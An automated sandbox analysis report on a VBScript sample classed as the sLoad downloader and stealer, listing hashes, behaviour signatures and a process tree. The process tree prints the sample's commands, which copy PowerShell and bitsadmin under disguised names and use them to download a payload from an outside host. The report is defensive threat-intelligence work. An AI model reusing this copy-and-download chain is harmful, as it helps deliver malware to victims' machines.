Overview

overview

10

Static

static

5d992840fc...0c.vbs

windows7_x64

10

5d992840fc...0c.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    158s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    24-03-2022 23:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs

  • Size

    6KB

  • MD5

    d7c45aaa2ec4c379c3590e85efd3e27c

  • SHA1

    182d0dd1d7e8c4797b70550c1fa26d20e691df37

  • SHA256

    5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c

  • SHA512

    b832b5d84d581d7bc9282cdcce3752d8423e0967a786c9c54601c270e9743267d57c0de68c0e5c97f51af3d1be040b341dc04f50e12c3e6700eb11282910c217

Score
10/10
sloadstealertrojan

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

    trojanstealersload
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe
        3⤵
          PID:4580
        • C:\Windows\system32\cmd.exe
          cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe
          3⤵
            PID:4524
        • C:\ProgramData\ZAblYWBin.exe
          "C:\ProgramData\ZAblYWBin.exe" /transfer bHfBoa /download https://waybackwhenbycynthia.com/edikaso/09518900965/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg
          2⤵
          • Executes dropped EXE
          PID:3540

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\ZAblYWBin.exe
        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit

      • C:\ProgramData\ZAblYWBin.exe
        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit

      • memory/1664-131-0x0000000000000000-mapping.dmp

        Download

      • memory/3540-135-0x0000000000000000-mapping.dmp

        Download

      • memory/4524-133-0x0000000000000000-mapping.dmp

        Download

      • memory/4580-132-0x0000000000000000-mapping.dmp

        Download